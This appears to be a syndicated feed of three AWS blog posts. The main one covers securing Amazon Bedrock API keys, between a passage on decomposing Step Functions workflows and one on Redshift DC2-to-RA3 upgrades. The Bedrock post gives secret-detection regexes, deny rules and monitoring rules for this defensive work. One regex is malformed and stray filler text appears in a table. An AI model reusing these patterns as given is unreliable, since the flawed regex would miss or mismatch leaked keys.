Parent-Child Pattern

The parent-child pattern represents a hierarchical approach to workflow organization where a main (parent) workflow orchestrates multiple sub-workflows (children). Parent workflows manage the overall business process and coordination, while child workflows handles specific, short-lived operations. This pattern is particularly effective when you need to balance between orchestration complexity and execution speed.

 Figure 2 : Decoupled parent state machine

Figure 2 : Decoupled parent state machine

The current monolithic workflow can be restructured by creating a parent workflow focused on order orchestration while delegating specific operations to Express child workflows. The parent workflow would maintain the high-level flow from order validation through completion, while time-sensitive operations like ValidateOrder, ProcessPayment, and ProcessShipping could become Express child workflows.

Kindly note that during an architecture re-vamp, Express workflows are different when compared to Standard Workflows. For example, you cannot have an Express parent workflow invoke a Standard child workflow. Also, an Express workflow does not support Job-run (.sync) or Callback (.waitForTaskToken) service integration patterns. You can refer to the differences between Standard and Express workflows documentation to choose the right architecture pattern.

For instance, the payment processing section could be transformed into a child Express workflow that handles all payment-related states (ProcessPayment, ProcessStandardPayment, ValidatePaymentPart) as a single unit. An express workflow is more suitable for sections like payment processing as their executions complete within 5 minutes. Hence this would also reduce the over-all cost of the workflow. Similarly, the shipping calculation logic involving CalculateExpressShipping and CalculateStandardShipping could be consolidated into another Express child workflow, leading to reduced costs and easier updates to shipping logic.

Domain Separation

Domain separation involves breaking down workflows based on distinct business capabilities or functional areas. Each domain-specific workflow becomes responsible for a complete business function, operating independently while communicating through well-defined interfaces. This approach aligns closely with micro-service architecture principles and domain-driven design. The architecture shows clear boundaries between different business domains that can be separated into independent workflows. Three primary domains emerge:

  1. Payment Domain: Encompassing ValidateOrder, ProcessPayment, ValidatePaymentPart, and related error handlers
  2. Inventory Domain: Including CheckInventory, UpdateInventory, and associated states
  3. Shipping Domain: Containing ProcessShipping, shipping calculations, and shipping status updates

Each domain would become its own workflow, with clear input/output contracts. This separation would allow specialized teams to maintain and deploy updates to their domain workflows independently ensuring implementation of domain-specific retry policies, error handling, and business rules without affecting other domains. For example, the payment team could enhance payment processing logic without impacting shipping or inventory operations.

 Figure 3 : Child state machine that handles payment workflow

Figure 3 : Child state machine that handles payment workflow

 Figure 4 : Child state machine that handles shipping workflow

Figure 4 : Child state machine that handles shipping workflow

Shared Utilities

Shared utility workflows serve as reusable components for common operations that appear across multiple business processes. These workflows encapsulate standard functionality like notification handling, data validation, logging, or audit trail creation. By centralizing these common operations, organizations can ensure consistency and reduce duplication across their Step Functions applications.

The current architecture repeats several common patterns that could be extracted into shared utility workflows. Most notably, the notification handling logic (SendEmail, SendSMSNotification, SendPushNotification) appears as a cluster of states at the end of the workflow. This could be consolidated into a single “NotificationManager” utility workflow that handles all types of notifications. These utility workflows could then be called from any other workflow in the system, ensuring consistent behavior and reducing code duplication.

 Figure 5 : Re-usable notification workflow

Figure 5 : Re-usable notification workflow

Error Workflows

Error workflows represent a specialized form of decomposition focused on centralizing error handling and recovery logic. Instead of embedding complex error handling in each business workflow, organizations can create dedicated workflows that manage different types of failures, retries, and compensation actions. This approach provides a consistent and maintainable way to handle errors across the application.

Each of these decomposition strategies can be used individually or in combination, depending on the specific needs of your application. For instance, utilization of Domain Separation pattern has resulted in streamlined error workflows. The key is to choose the appropriate combination that provides the right balance of maintainability, scalability, and operational efficiency for your use case. However, implementing all four strategies in a phased approach would provide the most comprehensive solution for long-term maintainability and scalability.

Results:

The comparison between monolithic and decoupled approaches reveals notable differences in performance and operational metrics. In order to emulate similar test environments across monolithic and decomposed state machines, we tested them in us-east-1 AWS region. We made use of the aforementioned workflows, both monolithic and decomposed to achieve a similar end goal. Pricing comparison is based on a monolithic workflow processing 11 state transitions per workflow across 30,000 monthly requests. For the decomposed approach, calculations assume Express child workflows configured with 64MB memory and 100ms execution duration, while the parent workflow handles 8 state transitions per workflow for the same volume of 30,000 monthly requests. AWS Lambda task states in both approaches complete within 2 seconds of execution time.

When decoupled, the workflows can be re-designed to use either Express or Standard mechanisms depending on their execution time and integration pattern requirements. In this use-case, we identified multiple workflows like PaymentProcessing, CalculateExpressShipping that are revamped to use Express workflows as per their requirement. While the monolithic approach shows a slightly faster execution duration of 11.5 seconds compared to 13 seconds in the decomposed approach, the monthly pricing significantly favors the decoupled architecture at $6.37 USD versus $11.90 USD for the monolithic approach. The decoupled approach demonstrates superior debugging capabilities with better error isolation and domain-specific debugging, contrasting with the monolithic approach’s complex debugging challenges due to heavy payloads and middle-state failure tracking. Additionally, the decoupled architecture benefits from smaller payload sizes through distributed data handling, whereas the monolithic workflow carries larger payloads across its 18 state transitions.

 

Monolithic Approach Decoupled Approach
Execution Duration 11.5 seconds for complete workflow execution 13 seconds with distributed processing across parent-child workflows
Monthly Pricing $11.90 USD (476,000 billable state transitions) $6.37 USD (Combined cost of Standard parent workflow and Express child workflows)
Debug Effort High – Complex debugging due to heavy payloads and difficulty in tracking failures in middle states. Cannot effectively use ResultSelector when final notification state needs all details. Lower – Easier to debug with isolated domains and smaller payloads. Better error isolation and domain-specific debugging.
Payload Size Larger payload size throughout workflow execution as all data needs to be carried across 18 state transitions Smaller payload size due to domain separation and distributed data handling across parent-child workflows

Conclusion

The need for decomposing Step Functions workflows becomes evident when you face challenges with monolithic workflows such as state explosion, version management complexities, and resource limitations. These challenges result in reduced operational efficiency, increased debugging complexity, and higher maintenance overhead as demonstrated by the comparison results showing differences in execution duration, pricing, debugging effort, and payload management. Organizations should evaluate workflow decomposition when they observe workflows exceeding 15-20 states, multiple team involvement in workflow maintenance, frequent independent updates across different business domains, complex error handling requirements, and the need for reusable components across workflows. The implementation of decomposition strategies through parent-child pattern for hierarchical workflow organization, domain separation for business capability isolation, shared utilities for common operations, and dedicated error workflows for centralized error handling has shown tangible benefits in terms of reduced costs, better error isolation, and more efficient payload management.

While implementing decomposition strategies, organizations must be cautious to avoid over-decomposition of workflows, maintaining tight coupling between workflows, and ignoring core design principles of loose coupling and single responsibility. This strategic approach to workflow decomposition ultimately leads to more maintainable, scalable, and cost-effective Step Functions applications that better serve business needs while reducing operational overhead. The transformation from monolithic to decomposed workflows represents a significant architectural improvement that enables organizations to better manage complex business processes while maintaining operational efficiency and system reliability.

Securing Amazon Bedrock API keys: Best practices for implementation and management

Post Syndicated from Jennifer Paz original https://aws.amazon.com/blogs/security/securing-amazon-bedrock-api-keys-best-practices-for-implementation-and-management/

Recently, AWS released Amazon Bedrock API keys to make calls to the Amazon Bedrock API. In this post, we provide practical security guidance on effectively implementing, monitoring, and managing this new option for accessing Amazon Bedrock to help you build a comprehensive strategy for securing these keys. We also provide guidance on the larger family of service-specific credentials, so that you can also reinforce your AWS CodeCommit and Amazon Keyspaces (for Apache Cassandra) implementation if needed.

Note: For the remainder of this post, the terms service-specific credentials and API keys will be used interchangeably.

Choosing the best mechanism to access Amazon Bedrock

Our recommendation is to use temporary security credentials provided by AWS Security Token Service (AWS STS) service whenever possible as a preferred authentication method.

API keys can be used when your use case blocks the use of temporary AWS STS credentials. A common example is when using third-party or packaged software that specifically requires API key authentication through HTTP bearer tokens and cannot be configured to use SigV4 signing with temporary AWS STS credentials.

If you find that you don’t need to use API Keys, consider using service control policies (SCPs) to deny the creation and use of these keys.

If you conclude that your use case requires API keys, then consider the two types of API keys:

  • Short-term API keys: Consider using short-term API keys if AWS STS credentials cannot be used, because they provide a built-in expiration mechanism and will automatically expire after a specified duration, stopping credentials from being used indefinitely if they are exposed.
  • Long-term API keys: Long-term API Keys should only be used when neither AWS STS credentials nor short-lived credentials can be used, such as with packaged software and SDKs that expect a static long-lived API key and cannot be modified.

While implementing the controls in this post addresses most API key security concerns, remember that security is an ongoing process. Continue following AWS security best practices and regularly review your security posture as part of a comprehensive security strategy.

Understanding service-specific credentials

Service-specific credentials are specialized authentication credentials that provide direct access to specific AWS services. These credentials are different from other AWS security credentials (such as access keys, secret access keys, and session tokens) and are designed for use with specific AWS services.

The key characteristics of service-specific credentials include:

Let’s learn more about service-specific credentials and their use with Amazon Bedrock.

Amazon Bedrock API keys

Amazon Bedrock API keys are service-specific credentials that provide direct access to Amazon Bedrock. The bedrock:CallWithBearerToken permission grants the ability to use these tokens to perform Amazon Bedrock API actions.

Key types and characteristics

There are two types of API keys, and they have the following characteristics.

Short-term API keys:

  • Uses pre-signed SigV4 authentication
  • Short-term API keys are generated locally on the client side, therefore their creation of these short-term keys won’t be recorded in CloudTrail
  • Cannot be retrieved through credential reports or AWS CLI calls
  • Last as long as the IAM session that generated the API key or 12 hours, whichever is shortest
  • Have the same permissions as the role that you use to generate the key
  • Pattern: bedrock-api-key-YmVkcm9jay5hbWF6b25hd3MuY29tLz9BY3Rpb249Q2FsbFdpdGhCZWFyZXJUb2tlbiZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsP[A-Za-Z0-9\\]+={0,2}

Long-term API keys:

  • When an Amazon Bedrock long-term API key is created through the Amazon Bedrock console, AWS automatically generates a dedicated IAM user with the naming convention BedrockAPIKey-xxx and attaches the AmazonBedrockLimitedAccess managed policy
  • The IAM user created through the Amazon Bedrock console doesn’t have console access enabled, a console password, an access key, or multi-factor authentication (MFA) enabled
  • Alternatively, when an Amazon Bedrock long-term key is created through the IAM console, you can associate the Amazon Bedrock service-specific credential directly to an existing IAM user
  • Each IAM user can have up to two long-term API keys
  • Can be configured with expiration periods ranging from one day to indefinite duration.
  • Duration can be controlled with three new condition keys to govern API keys for Amazon Bedrock. Here is an example SCP.
  • Pattern: ABSKQmVkcm9ja0FQSUtleS[A-Za-z0-9+\/]+={0,2}
  • CloudTrail will log an event when long-term API keys are created, as shown in the following example. You can also identify long-term API keys using the AWS CLI.
{
    "eventTime": "2025-07-23T17:39:08Z",
    "eventSource": "iam.amazonaws.com",
    "eventName": "CreateServiceSpecificCredential",
    "awsRegion": "us-east-1",
    "sourceIPAddress": "203.0.113.1",
    "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0",
    "requestParameters": {
        "userName": "BedrockAPIKey-0g21",
        "serviceName": "bedrock.amazonaws.com",
        "credentialAgeDays": 36500
    },
    "responseElements": {
        "serviceSpecificCredential": {
            "createDate": "Jul 23, 2025, 5:39:08 PM",
            "expirationDate": "Oct 7, 2125, 5:39:08 PM",
            "serviceName": "bedrock.amazonaws.com",
            "serviceCredentialAlias": "BedrockAPIKey-1234-56-EXAMPLE
",
            "serviceCredentialId": "ACCA123456789EXAMPLE",
            "userName": "BedrockAPIKey-0g21",
            "status": "Active"
        }
    }
}

Identify

There are several key aspects to understand when working with API keys. Short-term API keys are generated on the client-side and aren’t visible through standard AWS API listings.

Long-term API keys offer some additional visibility and can be managed through multiple methods. You can identify which principal has an associated long-term API key by using the Amazon Bedrock console or IAM console. You can list service-specific credentials using AWS CLI commands or the AWS SDK, which will list the service-specific credentials for a specified user.

Protect

Bedrock has introduced three condition keys that enhance your ability to control and secure API key usage within your AWS environment:

  • You can use the iam:ServiceSpecificCredentialServiceName condition key to allow the AWS services that a principal can create service-specific credentials for.
  • Use the iam:ServiceSpecificCredentialAgeDays condition to enforce security best practices by setting a maximum duration limit for long-term API keys at creation time.
  • Finally, by using the bedrock:BearerTokenType condition key, you can deny or allow the use of a specific type of API key for Amazon Bedrock, whether it’s a short-term or long-term API key.

These condition keys play an important role in managing the distinct security characteristics of short-term and long-term API keys, enabling security teams to enforce organizational policies and security best practices through SCPs at the AWS Organizations level. To learn more, see the GitHub repo for examples of how to apply these SCPs.

Short-term API keys include a native expiration window that helps limit potential security exposure. When implementing these keys, be aware that they inherit the permissions of the signing principal, which can be more than Amazon Bedrock permissions. You can implement comprehensive monitoring as described in the Detect section.

Long-term API keys, which can be configured with extended expiration periods, offer convenience for long-running applications but should have special attention regarding controls and monitoring mechanisms to offset the increased exposure window these credentials present.

If your organization has decided that Amazon Bedrock API keys aren’t required for your environment, you can implement SCPs to block the creation of service-specific credentials (iam:CreateServiceSpecificCredential) and block bearer token use for Amazon Bedrock (bedrock:CallWithBearerToken).

Note: If you do not use the condition iam:ServiceSpecificCredentialServiceName in an IAM policy, iam:CreateServiceSpecificCredential will then also deny the creation of API keys for other services, such as AWS CodeCommit and Amazon Keyspaces (for Apache Cassandra).

Here’s an example SCP that denies the creation of Amazon Bedrock service-specific credentials and the use of API keys in Amazon Bedrock. This prohibits builders in your organization from creating new API keys, reducing the risk of unauthorized key creation. This approach is valuable for organizations that want to maintain strict control over their authentication methods or have no business need for service-specific credentials. A condition can also be added to the SCP to allowlist specific roles to be able to create service-specific credentials by adding a condition ArnNotLikeIfExists for the principals listed under aws:PrincipalArn.

As part of protecting API keys, regularly review and adjust permissions to align with the principle of least privilege. For long-term API keys created through the Amazon Bedrock console, AWS automatically creates an IAM user with the AmazonBedrockLimitedAccess managed policy. This policy grants access to various Amazon Bedrock, AWS Key Management Service (AWS KMS), IAM, Amazon Elastic Compute Cloud (Amazon EC2), and AWS Marketplace actions. For both long-term and short-term API keys, evaluate if your principals have more permissions than required for their use case. If excessive permissions are identified, replace the AmazonBedrockLimitedAccess policy with a custom policy that has scoped down permissions.

Detect

API keys require different monitoring approaches based on their type. While the creation of short-term API keys cannot be detected because they are generated client-side, the creation of long-term API keys can be monitored through CloudTrail events. However, the use of both short-term and long-term API keys can be detected through CloudTrail events. Because of their extended validity period, long-term API keys are more susceptible to unauthorized use, making comprehensive monitoring essential. Organizations should implement stringent monitoring controls including:

  • Monitor CreateUser events with BedrockAPIKey- prefix usernames. If a user was created through the Amazon Bedrock console, the event will look like the following:
  • {
        "eventTime": "2025-07-23T17:39:08Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateUser",
        "awsRegion": "us-east-1",
        "sourceIPAddress": "203.0.113.1",
        "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0",
        "requestParameters": {
            "userName": "BedrockAPIKey-0g21"
        },
        "responseElements": {
            "user": {
                "path": "/",
                "userName": "BedrockAPIKey-0g21",
                "userId": " AIDACKCEVSQ6C2EXAMPLE",
                "arn": "arn:aws:iam: 111122223333:user/BedrockAPIKey-0g21",
                "createDate": "Jul 23, 2025, 5:39:08 PM"
            }
        }
    }
    

    • Track CreateServiceSpecificCredential events for requestparameters.serviceName = bedrock.amazonaws.com
    • Watch for active API key usage indicators:
      • additionalEventData.callWithBearerToken = true
      • eventSource = bedrock.amazonaws.com
    {
        "eventVersion": "1.11",
        "userIdentity": {
            "type": "IAMUser",
            "principalId": " AIDACKCEVSQ6C2EXAMPLE",
            "arn": "arn:aws:iam::user/BedrockAPIKey-0g21",
            "accountId": "",
            "userName": "BedrockAPIKey-0g21"
        },
        "eventTime": "2025-07-23T17:39:37Z",
        "eventSource": "bedrock.amazonaws.com",
        "eventName": "Converse",
        "awsRegion": "us-east-1",
        "sourceIPAddress": "",
        "userAgent": "curl/8.11.1",
        "requestParameters": {
            "modelId": "us.anthropic.claude-3-5-haiku-20241022-v1:0"
        },
        "responseElements": null,
        "additionalEventData": {
            "callWithBearerToken": true,
            "inferenceRegion": "us-west-2"
        }
    }
    

    For a list of events to monitor, see Security Playbook for Responding to Amazon Bedrock Security Events.

    Amazon EventBridge rules

    You can enhance your security monitoring by implementing Amazon EventBridge rules to detect and alert on Amazon Bedrock API key lifecycle events, such as CreateServiceSpecificCredential.

    Using EventBridge rules for monitoring has four components.

    • EventBridge rules: CreateServiceSpecificCredentialRule and BearerTokenUsageRule monitor CloudTrail for credential creation and bearer token usage
    • SNS topic: BedrockAlertsTopic delivers encrypted security alerts through email
    • KMS key: SNSEncryptionKey encrypts SNS messages
    • IAM roles: Provide necessary access for service operations

    The preceding EventBridge rules monitor for specific patterns within a CloudTrail log, keying from eventName (the action being performed), eventSource (the service that the action is being performed by or to), and additionalEventData (the block of details of the response).

    The following rule checks for the CloudTrail event CreateServiceSpecificCredential.

            source:
              - aws.iam
            detail-type:
              - AWS API Call via CloudTrail
            detail:
              eventSource:
                - iam.amazonaws.com
              eventName:
                - CreateServiceSpecificCredential
    

    Use the following rule to look for actions performed with an API key (BearerToken = true):

            detail-type:
              - AWS API Call via CloudTrail
            detail:
              additionalEventData:
                callWithBearerToken:
                  - true

    EventBridge rule deployment

    Use the CloudFormation template to set up automated monitoring for both the creation of service-specific credentials and their subsequent use. The template configures EventBridge to send email notifications when the preceding CloudTrail events are detected, providing real-time awareness of API key operations in your environment. To learn more, see the GitHub repo for the details of this solution and the CloudFormation template.

    AWS Config rule for compliance

    Use an AWS Config rule to monitor IAM users for active service-specific credentials to help maintain compliance with security policies.

    The following are the steps taken by the AWS Config rule:

    1. Every 24 hours, the AWS Config rule triggers a Lambda function that enumerates IAM users in the account
    2. For each user, the function checks for active service-specific credentials
      1. Users with service-specific credentials are marked as NON_COMPLIANT
      2. Users without active credentials are marked as COMPLIANT
    3. Results are submitted to AWS Config for reporting and potential remediation

    Config rule deployment

    You can deploy this AWS Config rule by using AWS Config RDK, in CloudShell, or using your local CLI.

    1. git clone https://github.com/awslabs/aws-config-rules.git
    2. cd aws-config-rules/python-rdklib
    3. git fetch && git checkout IAM_USER_NO_SERVICE_SPECIFIC_CREDENTIALS
    4. pip install rdk rdklib
    5. rdk deploy IAM_USER_NO_SERVICE_SPECIFIC_CREDENTIALS
    6. aws configservice start-config-rules-evaluation --config-rule-names “IAM_USER_NO_SERVICE_SPECIFIC_CREDENTIALS”

    Respond and recover

    Every incident response plan starts with the preparation phase. As part of the preparation phase, you should maintain clear records of API key ownership and usage, document which applications and teams use specific keys, and if long-term API keys are necessary, consider using secure storage such as AWS Secrets Manager.

    When a security incident involving API keys is suspected, immediate action is crucial. The first step is to verify the potential compromise by reviewing CloudTrail logs to correlate API key creation use with approved change requests. This helps identify unauthorized key creation or use. Additionally, analyzing the source IP addresses and user agent strings from these logs can help determine if the access originated from approved locations and applications or potentially malicious sources.

    The incident response approach varies significantly between key types. For short-term keys, while their maximum 12-hour expiration window limits potential damage, it’s still important to take immediate action rather than waiting for expiration. Security teams should identify applications or systems using the compromised short-term key and revoke the IAM role session or deny permissions to bedrock:CallWithBearerToken from the identity.

    If an Amazon Bedrock long-term API key is involved in an active security event, security teams can take immediate action through either the console or AWS CLI. Through the console, teams can use the IAM console to quickly deactivate or delete long-term API keys. For organizations with automated response procedures, the AWS CLI provides commands for key management:

    Respond using the AWS CLI

    Use the following steps to respond to an API key event.

    1. Identify service-specific credentials:

    aws iam list-service-specific-credentials --user-name <user name> --service-name bedrock.amazonaws.com

    1. For immediate containment, you can deactivate the credential using the credential ID from the previous step:

    aws iam update-service-specific-credential --service-specific-credential-id <credential ID> --user-name <user name> --status Inactive

    1. After you’ve assessed the event, you can permanently remove the associated API keys:

    aws iam delete-service-specific-credential --service-specific-credential-id <credential ID> --user-name <user name>

    During the recovery phase, focus on creating new secure keys with appropriate configurations, updating application configurations, and make sure that all affected continuous integration and delivery (CI/CD) pipelines and development teams are notified of the changes.

    Review of Amazon Bedrock API keys

    The following table summarizes the various elements related to Amazon Bedrock API keys mapped to the NIST CSF 2.0 core function.

    Type

    Identify

    Protect

    Detect (using events in CloudTrail)

    Respond

    Short-term API key Whitetexttexttexttext

    Short-term API keys are generated client-side and are not listed by an AWS API.

    Creation: Cannot block creation because short-term API keys are generated client-side.

    Use: Deny action bedrock:CallWithBearerToken to avoid use

    Modify permissions for long-term and short-term Amazon Bedrock API keys

    Creation: Occurs client-side and no events are present in CloudTrail

    Use: CloudTrail events with additionalEventData.callWithBearerToken = true

    EventBridge rules and SNS to detect/notify on the usage of API keys.

    Revoke IAM role session or deny permissions from identityWhitetexttexttext

    Long-term API key Whitetexttexttexttext

    IAM ListServiceSpecificCredentials action using the AWS CLI or SDKs

    Creation: Deny action iam:CreateServiceSpecificCredential to block creation of service specific credentials across the services, including Amazon Bedrock.

    Use: Deny action bedrock:CallWithBearerToken to avoid use

    Modify permissions for long-term and short-term Bedrock API keys

    Creation: CloudTrail events with eventName iam:CreateServiceSpecificCredential, and iam:CreateUser when using the console.

    Use: CloudTrail events with additionalEventData.callWithBearerToken = true

    EventBridge rules and SNS to detect and notify on creation and usage of API keys.

    Config rule

    Use the console or AWS CLI to quickly deactivate or delete long-term API keys Whitetexttexttext

    Broader service-specific credentials: Beyond Amazon Bedrock

    Along with Amazon Bedrock support of API keys, other AWS services support service specific credentials, such as AWS CodeCommit and Amazon Keyspaces.

    The security measures suggested in this post can also be applied to these services. The following table lists common use cases for these service specific credentials.

    Service

    Use case

    Service name in response from iam:ListServiceSpecificCredentials

    Suggested alternatives

    AWS CodeCommit Git credentials

    Used to upload, add, or edit a file in an AWS CodeCommit repository

    codecommit.amazonaws.com

    Methods include SSH authentication and federated authentication: AWS CodeCommit: Setting up using other methods

    Amazon Keyspaces credentials for Apache Cassandra

    Used for Apache Cassandra-compatible access

    cassandra.amazonaws.com

    SigV4 authentication plugin is available and supports multiple programming languages and enables IAM roles and federated identities to authenticate. Create temporary credentials to connect to Amazon Keyspaces using an IAM role and the SigV4 plugin

    Conclusion

    Understanding the implications of long-term API keys and how to manage them helps you to make informed decisions about your Amazon Bedrock API key implementation strategy. The key is to align security controls with risk appetite and operational requirements while maintaining a strong security posture.

    AWS strongly recommends using AWS STS credentials as the primary authentication method wherever possible. If AWS STS credentials cannot be used, consider short-term API keys with their built-in expiration mechanism. Long-term API keys should only be implemented when neither AWS STS credentials nor short-term credentials are viable options. When implementing API keys, organizations should focus on identifying API keys through AWS CLI and CloudTrail logs, protecting by implementing preventive controls such as SCPs to manage API key creation and usage, detecting API key activities through comprehensive monitoring using CloudTrail events, EventBridge and AWS Config rules, and responding by maintaining clear incident response procedures to quickly address potentially compromised API keys.

    Best practice is to implement these controls while maintaining proper access controls through the principle of least privilege. This layered approach helps you maintain a strong security posture while effectively using API keys for your development needs.

Jennifer Paz

Jennifer Paz
Jennifer is a Security Engineer with over a decade of experience, currently serving on the AWS Customer Incident Response Team (CIRT). Jennifer enjoys helping customers tackle security challenges and implementing complex solutions to enhance their security posture. When not at work, Jennifer is an avid runner, pickleball enthusiast, traveler, and foodie, always on the hunt for new culinary adventures.

Kyle Dickinson

Kyle Dickinson
I was once a Gibson explorer turned cloud security expert; as a Sr. Security Solution Architect at AWS, I now protect the systems I once explored. When not safeguarding AWS customers, I’m building LEGO creations or attempting to improve my longboarding skills without major injury. My home life revolves around a tiny dog with massive confidence and my spirited 4-year-old daughter, who keeps me laughing.

Best practices for upgrading from Amazon Redshift DC2 to RA3 and Amazon Redshift Serverless

Post Syndicated from Ziad Wali original https://aws.amazon.com/blogs/big-data/best-practices-for-upgrading-from-amazon-redshift-dc2-to-ra3-and-amazon-redshift-serverless/

Amazon Redshift is a fast, petabyte-scale cloud data warehouse that makes it simple and cost-effective to analyze your data using standard SQL and your existing business intelligence (BI) tools. Tens of thousands of customers rely on Amazon Redshift to analyze exabytes of data and run complex analytical queries, delivering the best price-performance.

With a fully managed, AI-powered, massively parallel processing (MPP) architecture, Amazon Redshift drives business decision-making quickly and cost-effectively. Previously, Amazon Redshift offered DC2 (Dense Compute) node types optimized for compute-intensive workloads. However, they lacked the flexibility to scale compute and storage independently and didn’t support many of the modern features now available. As analytical demands grow, many customers are upgrading from DC2 to RA3 or Amazon Redshift Serverless, which offer independent compute and storage scaling, along with advanced capabilities such as data sharing, zero-ETL integration, and built-in artificial intelligence and machine learning (AI/ML) support with Amazon Redshift ML.

This post provides a practical guide to plan your target architecture and migration strategy, covering upgrade options, key considerations, and best practices to facilitate a successful and seamless transition.

Upgrade process from DC2 nodes to RA3 and Redshift Serverless

The first step towards upgrade is to understand how the new architecture should be sized; for this, AWS provides a recommendation table for provisioned clusters. When determining the configuration for Redshift Serverless endpoints, you can assess compute capacity details by examining the relationship between RPUs and memory. Each RPU allocates 16 GiB of RAM. To estimate the base RPU requirement, divide your DC2 nodes cluster’s total RAM by 16. These recommendations provide guidance in sizing the initial target architecture but depend on the computing requirements of your workload. To better estimate your requirements, consider conducting a proof of concept that uses Redshift Test Drive to run potential configurations. To learn more, see Find the best Amazon Redshift configuration for your workload using Redshift Test Drive and Successfully conduct a proof of concept in Amazon Redshift. After you decide on the target configuration and architecture, you can build the strategy for upgrading.

Architecture patterns

The first step is to define the target architecture for your solution. You can choose the main architecture pattern that best aligns with your use case from the options presented in Architecture patterns to optimize Amazon Redshift performance at scale. There are two main scenarios, as illustrated in the following diagram.

At the time of writing, Redshift Serverless doesn’t have manual workload management; everything runs with automatic workload management. Consider isolating your workload into multiple endpoints based on use case to enable independent scaling and better performance. For more information, refer to Architecture patterns to optimize Amazon Redshift performance at scale.

Upgrade strategies

You can choose from two possible upgrade options when upgrading from DC2 nodes to RA3 nodes or Redshift Serverless:

  • Full re-architecture – The first step is to evaluate and assess the workloads to determine whether you could benefit from a modern data architecture, then re-architect the existing platform during the upgrade process from DC2 nodes.
  • Phased approach– This is a two-stage strategy. The first stage involves a straightforward migration to the target RA3 or Serverless configuration. In the second stage, you can modernize the target architecture by taking advantage of cutting-edge Redshift features.

We usually recommend a phased approach, which allows for a smoother transition while enabling future optimization. The first stage of a phased approach consists of the following steps:

  • Evaluate an equivalent RA3 nodes or Redshift Serverless configuration for your existing DC2 cluster, using the sizing guidelines for provisioned clusters or the compute capacity options for serverless endpoints.
  • Thoroughly validate the chosen target configuration in a non-production environment using Redshift Test Drive. This automated tool simplifies the process of simulating your production workloads on various potential target configurations, enabling a comprehensive what-if analysis. This step is strongly recommended.
  • Proceed to the upgrade process when you are satisfied with the price-performance ratio of a particular target configuration, using one of the methods detailed in the following section.

Redshift RA3 instances and Redshift Serverless provide access to powerful new capabilities, including zero-ETL, Amazon Redshift Streaming Ingestion, data sharing writes, and independent compute and storage scaling. To maximize these benefits, we recommend conducting a comprehensive review of your current architecture (the second stage of a phased approach) to identify opportunities for modernization using Amazon Redshift’s latest features. For example:

Upgrade options

You can choose from three ways to resize or upgrade a Redshift cluster from DC2 to RA3 or Redshift Serverless: snapshot restore, classic resize, and elastic resize.

Snapshot restore

The snapshot restore method follows a sequential process that begins with capturing a snapshot of your existing (source) cluster. This snapshot is then used to create a new target cluster with your desired specifications. After creation, it’s essential to verify data integrity by confirming that data has been correctly transferred to the target cluster. An important consideration is that any data written to the source cluster after the initial snapshot must be manually transferred to maintain synchronization.

This method offers the following advantages:

  • Allows for the validation of the new RA3 or Serverless setup without affecting the existing DC2 cluster
  • Provides the flexibility to restore to different AWS Regions or Availability Zones
  • Minimizes cluster downtime for write operations during the transition

Keep in mind the following considerations:

  • Setup and data restore might take longer than elastic resize.
  • You might encounter data synchronization challenges. Any new data written to the source cluster after snapshot creation requires manual copying to the target. This process might need multiple iterations to achieve full synchronization and require downtime before cutoff.
  • A new Redshift endpoint is generated, necessitating connection updates. Consider renaming both clusters in order to maintain the original endpoint (make sure the new target cluster adopts the original source cluster’s name)

Classic resize

Amazon Redshift creates a target cluster and migrates your data and metadata to it from the source cluster using a backup and restore operation. All your data, including database schemas and user configurations, is accurately transferred to the new cluster. The source cluster restarts initially and is unavailable for a few minutes, causing minimal downtime. It quickly resumes, allowing both read and write operations as the resize continues in the background.

Classic resize is a two-stage process:

  • Stage 1 (critical path) – During this stage, metadata migration occurs between the source and target configurations, temporarily placing the source cluster in read-only mode. This initial phase is typically brief. When this phase is complete, the cluster is made available for read and write queries. Although tables originally configured with KEY distribution style are temporarily stored using EVEN distribution, they will be redistributed to their original KEY distribution during Stage 2 of the process.
  • Stage 2 (background operations) – This stage focuses on restoring data to its original distribution patterns. This operation runs in the background with low priority without interfering with the primary migration process. The duration of this stage varies based on multiple factors, including the volume of data being redistributed, ongoing cluster workload, and the target configuration being used.

The overall resize duration is primarily determined by the data volume being processed. You can monitor progress on the Amazon Redshift console or by using the SYS_RESTORE_STATE system view, which displays the percentage completed for the table being converted (accessing this view requires superuser privileges).

The classic resize approach offers the following advantages:

  • All possible target node configurations are supported
  • A comprehensive reconfiguration of the source cluster rebalances the data slices to default per node, leading to even data distribution across the nodes

However, keep in mind the following:

  • Stage 2 redistributes the data for optimal performance. However, Stage 2 runs at a lower priority, and in busy clusters, it can take a long time to complete. To speed up the process, you can manually run the ALTER TABLE DISTSTYLE command on your tables having KEY DISTSTYLE. By executing this command, you can prioritize the data redistribution to happen faster, mitigating any potential performance degradation due to the ongoing Stage 2 process.
  • Due to the Stage 2 background redistribution process, queries can take longer to complete during the resize operation. Consider enabling concurrency scaling as a mitigation strategy.
  • Drop unnecessary and unused tables before initiating a resize to speed up data distribution.
  • The snapshot used for the resize operation becomes dedicated to this operation only. Therefore, it can’t be used for a table restore or other purpose.
  • The cluster must operate within a virtual private cloud (VPC).
  • This approach requires a new or a recent manual snapshot taken before initiating a classic resize.
  • We recommend scheduling the operation during off-peak hours or maintenance windows for minimal business impact.

Elastic resize

When using elastic resize to change the node type, Amazon Redshift follows a sequential process. It begins by creating a snapshot of your existing cluster, then provisions a new target cluster using the most recent data from that snapshot. While data transfers to the new cluster in the background, the system remains in read-only mode. As the resize operation approaches completion, Amazon Redshift automatically redirects the endpoint to the new cluster and stops all connections to the original one. If any issues arise during this process, the system typically performs an automatic rollback without requiring manual intervention, though such failures are rare.

Elastic resize offers several advantages:

  • It’s a quick process that takes 10–15 minutes on average
  • Users maintain read access to their data during the process, experiencing only minimal interruption
  • The cluster endpoint remains unchanged throughout and after the operation

When considering this approach, keep in mind the following:

  • Elastic resize operations can only be performed on clusters using the EC2-VPC platform. Therefore, it’s not available for Redshift Serverless.
  • The target node configuration must provide sufficient storage capacity for existing data.
  • Not all target cluster configurations support elastic resize. In such cases, consider using classic resize or snapshot restore.
  • After the process is started, elastic resize can’t be stopped.
  • Data slices remain unchanged; this can potentially cause some data or CPU skew.

Upgrade recommendations

The following flowchart visually guides the decision-making process for choosing the appropriate Amazon Redshift upgrade method.

